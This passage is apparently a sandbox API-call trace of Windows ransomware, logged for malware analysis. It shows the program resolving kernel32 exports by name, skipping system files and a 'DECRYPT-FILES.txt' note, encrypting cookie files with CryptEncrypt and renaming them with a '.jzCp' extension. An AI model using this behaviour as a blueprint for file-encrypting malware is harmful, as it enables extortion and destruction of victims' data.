lpString1="DeleteFileA") returned="DeleteFileA" [0079.282] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.282] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.282] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.282] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.282] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.282] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.282] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.283] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.283] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.283] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.283] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.283] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.283] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.283] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.283] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.283] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.283] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.283] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.283] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.283] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.283] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.283] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.283] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.283] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.283] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.283] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.283] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.284] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.284] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.284] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.284] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.284] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.284] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.284] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.284] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.284] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.284] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.284] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.284] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.284] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.284] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt") returned 108 [0079.284] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp") returned 113 [0079.285] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt.jzCp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt.jzcp"), dwFlags=0x0) returned 1 [0079.285] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.285] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.286] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.286] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45798350, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45798350, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x45798350, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@c.bing[1].txt", cAlternateFileName="5P5NRG~2.TXT")) returned 1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="autorun.inf") returned -1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="boot.ini") returned -1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="desktop.ini") returned -1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="ntuser.dat") returned -1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="iconcache.db") returned -1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="bootsect.bak") returned -1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="thumbs.db") returned -1 [0079.286] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@c.bing[1].txt", lpString2="Bootfont.bin") returned -1 [0079.286] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@c.bing[1].txt") returned 34 [0079.286] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.286] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.286] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.286] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.286] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.286] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@c.bing[1].txt") returned 34 [0079.286] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.286] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@c.bing[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" [0079.286] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.287] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.287] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=456) returned 1 [0079.287] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.287] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.288] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.288] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.288] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.288] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.288] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.289] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.289] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.289] CloseHandle (hObject=0x464) returned 1 [0079.289] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.289] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.290] CloseHandle (hObject=0x0) returned 0 [0079.290] CloseHandle (hObject=0x460) returned 1 [0079.291] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.291] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.292] GetTickCount () returned 0x114c514 [0079.292] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.292] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.292] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.292] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.292] lstrlenA (lpString="kernel32.dll") returned 12 [0079.293] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.293] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.293] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.293] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.293] lstrlenA (lpString="ADDATOMA") returned 8 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.293] lstrlenA (lpString="ADDATOMW") returned 8 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.293] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.293] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.293] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.293] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.293] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.293] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.293] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.293] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.293] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.293] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.293] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.293] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.293] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.294] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.294] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.294] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.294] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.294] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.294] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.294] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.294] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.294] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.294] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.294] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.294] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.294] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.294] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.294] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.294] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.294] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.294] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.294] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.295] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.295] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.295] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.295] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.295] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.295] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.295] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.295] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.295] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.295] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.295] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 